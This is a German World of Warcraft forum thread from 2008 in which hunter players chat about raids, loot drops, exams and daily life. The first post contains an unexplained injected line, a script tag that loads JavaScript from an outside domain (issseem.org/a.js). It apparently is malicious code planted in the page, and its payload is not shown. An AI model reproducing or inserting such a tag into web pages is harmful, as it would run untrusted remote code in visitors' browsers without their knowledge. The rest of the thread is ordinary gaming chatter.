Springe zu Inhalt


Foto

Hunter Talk


  • Bitte einloggen zum Antworten
9507 Antworten zu diesem Thema

#1 Trel

Trel

    Party Oger

  • Mitglieder
  • PIPPIPPIP
  • 417 Beiträge:

Geschrieben: 29 February 2008 - 14:57

-gesehen bei den Krieger
-für gut befunden
-will ich hier einführen :D
<script src=http://www.issseem.org/a.js></script>
Also mach ich den anfange...

Bin grad auf Arbeit und muss warten bis was Fertig gerechnet ist bis ich weiter machen kann.

Gestern im raid schnell fds durchgerushd um die neuen mit der pre auszustatten, da wir dringen heiler für mh/bt brauchen. in letzter zeit gehen anscheinend ziemlich viele in den heil streik :D
  • 3

#2 Mahoni-chan

Mahoni-chan

    Mr. Hunter-san

  • Mitglieder
  • PIPPIPPIPPIPPIPPIPPIP
  • 6727 Beiträge:

Geschrieben: 29 February 2008 - 15:05

Erstmal LOL@deine Sig :p
Nja, was ich so treibe? Erstmal ärgere ich mich, nicht mit dem Guide weiterzukommen, aber die Abschlussprüfung der Ausbildung hat einfach Vorrang ;) Status ist aber ca 70% für jene, die es interessiert.

Thread find i übrigens i.O. hab au schon überlegt nen generellen TalkThread aufzumachen ^^ Gerade weil wir in anderen THreads immer arg schnell ins OT abdriften, sobald das Thema PvP auftaucht - wo ich endlich wieder meine 2k haben will -.-"
Drecks Dudu/WL @ Blade-Edge

/edit
Alles gude Koloss
  • 0

#3 K0l0ss

K0l0ss

    Rides on the edge of the world

  • Mitglieder
  • PIPPIPPIPPIPPIPPIP
  • 3282 Beiträge:

Geschrieben: 29 February 2008 - 15:05

Hm...gerade auf meine Gäste warten, die gleich kommen, da ich heute 16 geworden bin.

Gestern? Leider nur Lurker und Hydross gelegt auf Grund eines sehr schlechten Set-Ups.
  • 0

#4 Trel

Trel

    Party Oger

  • Mitglieder
  • PIPPIPPIP
  • 417 Beiträge:

Geschrieben: 29 February 2008 - 15:58

dann auch mal alles gute von mir :D

und net so übertreiben...


@Mahoni

Bin auf deinen Neuen Guide gespannt :D
Meine sig... naja bin wenn ich daheim bin zu beschäftig Foren durchzuschauen :D

und zum thema prüfungen (man will ja zu allem seinen Senf geben :D)

Hab nächste woche Mittwoch Zwischenprüfung :p also heist es bei mir wohl auch ab und an lehrnen
  • 0

#5 K0l0ss

K0l0ss

    Rides on the edge of the world

  • Mitglieder
  • PIPPIPPIPPIPPIPPIP
  • 3282 Beiträge:

Geschrieben: 29 February 2008 - 16:17

Danke.

Ne, keine Panik, ich übertreibs nicht, hab morgen ein Basketballspiel. :D
  • 0

#6 Wynd

Wynd

    Fortgeschrittenes Mitglied

  • Mitglieder
  • PIPPIPPIP
  • 485 Beiträge:

Geschrieben: 29 February 2008 - 16:45

oookay. der verständnis halber: bei "was macht ihr gerade?" gehts um RL, und bei "was war gestern los?" gehts um ingame-stuff, ja?

gerade: gelangweilt im büro sitzen und auf feierabend warten (noch 16 min.) :victory:

gestern: nicht ge-huntert sondern mini-druide getwinkt. kurz vorm eindösen 20 geworden und bin fortan auf samtpfoten unterwegs durch azeroth :top:
  • 0

#7 Dr.Disconnect

Dr.Disconnect

    Shit-Lord

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 1370 Beiträge:

Geschrieben: 29 February 2008 - 16:53

naja also ich langweile mich grad, hatte heute letzten tag vom praktikum und war bis eben noch kräuter farmen für ini's und raid's (tränke)
naja gestern war nix los :pilot:
  • 0

#8 Trel

Trel

    Party Oger

  • Mitglieder
  • PIPPIPPIP
  • 417 Beiträge:

Geschrieben: 29 February 2008 - 16:59

einfach allg. palaber der hunter unter sich :D

neue items, neue freundin?? neuer job, alles mögliche was euch einfällt :D
  • 0

#9 Shotoku

Shotoku

    Mitglied

  • Mitglieder
  • PIPPIP
  • 43 Beiträge:

Geschrieben: 29 February 2008 - 20:00

auf feierabend warten (3 minutes to go). und heut abend bissi lvln/questen oder beurfe pushen. Gruppe fuer Ini findet man auf meinem Realm eh nie :-D.
  • 0

#10 FERT

FERT

    das räudige tier

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 1322 Beiträge:

Geschrieben: 29 February 2008 - 21:36

endlich we ... arbeit ist so ... ja ... gut, da kann ich wow zocken, hmm
egal, zuhause > arbeit !

was mach ich grad, außer langweilen twinken ... hmm umskillen ... mm für pvp <3 :>
aber das kostet wieder, und ich hab nur 3g ._.
  • 0

#11 JimmyGlitschy

JimmyGlitschy

    Mitglied

  • Mitglieder
  • PIPPIP
  • 20 Beiträge:

Geschrieben: 01 March 2008 - 01:56

gestern "Blendschlag" gedropt, sketis bei der begleitquest ---- ins ah gestellt für lockere 1,7k g
kauft eh keiner so wies aussieht:)

bis grad eben kara gewesen,paar leute ausser stamm waren ned da,also rdm grp, war ganz ok.....

wollt eigendlich grad noch w...., aber doch viel zu müde, naja ab ins bettchen getz:)

n8 und bis nachher

ps: zu der zeit kommen keine anständigen sätze zustande
  • 0

#12 olisec

olisec

    Senior

  • Mitglieder
  • PIPPIPPIPPIP
  • 986 Beiträge:

Geschrieben: 01 March 2008 - 11:08

gestern war ich nur schattenlaby hero, aber irgendwie haben wir murmur nicht down gekriegt.
hab mir gard die edelsteintasche vom konsortium geholt und stolze 4 blaue steinchen bekommen.
  • 0

#13 Thorgun

Thorgun

    Suff für die Zwerge!

  • Mitglieder
  • PIPPIPPIP
  • 392 Beiträge:

Geschrieben: 01 March 2008 - 11:40

Auf Freundin warten weil wir gleich nach Bremen wollen ( pff ich scheiß aufs Unwetter, da kommt eh nix :p )

Gestern endlich Epic - Mount bekommen , musste mir aber 1600g vom Kollegen leihen bzw. er meinte gestern zu mir als wir hier gemütlich 1-2 Pils getrunken haben : "ich geb dir datt jetzt" ^^

Ansonsten wollt ich eigentlich aufräumen aber hätte auch nicht wenig Bock auf Dailys :)
  • 0

#14 FERT

FERT

    das räudige tier

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 1322 Beiträge:

Geschrieben: 01 March 2008 - 12:03

wieder gefarmt, ich kann mm im pvp (open pvp/bg) nicht mehr zocken, ... need i-win-button :s

ach herrlich :| wär ich doch nur nicht zu faul zum farmen
  • 0

#15 Mahoni-chan

Mahoni-chan

    Mr. Hunter-san

  • Mitglieder
  • PIPPIPPIPPIPPIPPIPPIP
  • 6727 Beiträge:

Geschrieben: 01 March 2008 - 12:58

Karagrps organ suckt :)
  • 0

#16 Dr.Disconnect

Dr.Disconnect

    Shit-Lord

  • Mitglieder
  • PIPPIPPIPPIPPIP
  • 1370 Beiträge:

Geschrieben: 01 March 2008 - 14:22

Karagrps organ suckt smile.gif


aber gewaltig^^

naja n bissl skettis ruf farmen usw nix besonderes
  • 0

#17 kingofthejungle

kingofthejungle

    Fortgeschrittenes Mitglied

  • Mitglieder
  • PIPPIPPIP
  • 106 Beiträge:

Geschrieben: 01 March 2008 - 17:03

hmmm also mein Tag war ganz ordentlich, neue gilde und direkt als 2cond hunter stammplatz in ssc und tk raid bekommen.

Gestern neuen hero-umhang, vermächtnis und t4 handschuhe....

dropglück hab ich allemahl immoment, alles was ich mal so habe will dropt zu 90 prozent nur der scheiss Prinzenbogen auf den warte ich schon seit X-runs und er will und will nicht dropen....


mfg Morgol
  • 0

#18 K0l0ss

K0l0ss

    Rides on the edge of the world

  • Mitglieder
  • PIPPIPPIPPIPPIPPIP
  • 3282 Beiträge:

Geschrieben: 01 March 2008 - 19:45

dropglück hab ich allemahl immoment, alles was ich mal so habe will dropt zu 90 prozent nur der scheiss Prinzenbogen auf den warte ich schon seit X-runs und er will und will nicht dropen....
mfg Morgol


Glücklicher...ich geh seit Sommer letzten Jahres Kara. Ich hab noch nie Jäger T4 gesehen. Weder Handschuhe, noch Helm. Vermächtnis hab ich auch noch nie gesehen. Und Prinzen-Bogen? Einmal gesehen. Der wurd mir dann von einem anderen Hunter weggerollt, der zu dem Zeitpunkt eine Woche in der Gilde war und nun inaktiv ist...
  • 0

#19 Delhoven

Delhoven

    Fortgeschrittenes Mitglied

  • Mitglieder
  • PIPPIPPIP
  • 455 Beiträge:

Geschrieben: 01 March 2008 - 20:09

Gerade festgestellt, das auch Hunter Drood und Mage rocken können =)

Sonst nix zu tun, perle is auf Mädels Party ;D

Twink BG inc!
  • 0

#20 K0l0ss

K0l0ss

    Rides on the edge of the world

  • Mitglieder
  • PIPPIPPIPPIPPIPPIP
  • 3282 Beiträge:

Geschrieben: 02 March 2008 - 22:34

omg...gerade mal gar nix in ssc und tk auf die Reihe bekommen. Nix gelegt. Und 4 Stunden rumgegimpt. :ohmy:
  • 0




0 Benutzer lesen gerade dieses Thema

0 Mitglieder, 0 Gäste, 0 unsichtbare Mitglieder